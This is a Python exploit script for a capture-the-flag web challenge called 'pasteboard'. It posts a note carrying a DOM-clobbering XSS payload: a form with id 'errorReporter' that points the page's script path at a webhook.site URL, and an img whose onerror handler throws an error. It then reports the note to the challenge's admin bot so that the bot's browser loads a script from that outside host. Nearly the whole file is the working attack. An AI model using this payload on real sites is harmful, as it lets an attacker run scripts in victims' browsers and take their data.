import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# EXACT working payload from your HTML - note the id="renderConfig"!
working_payload = '''<form id="errorReporter"><input name="path" value="//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/flag.js?"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[*] Using EXACT working payload with id='renderConfig'")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "EXACT WORKING", "body": working_payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    print()
    print("[*] Try clicking this URL yourself to see if it works")
    print("[*] You should see console error and script load attempt")
    print()
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported to bot!")
        print()
        print("[*] This SHOULD produce empty GET to /flag.js?")
        print("[*] Check webhook: https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
else:
    print(f"[-] Failed: {resp.status_code}")

print()
print("="*70)
print("EXACT PAYLOAD USED:")
print("="*70)
print(working_payload)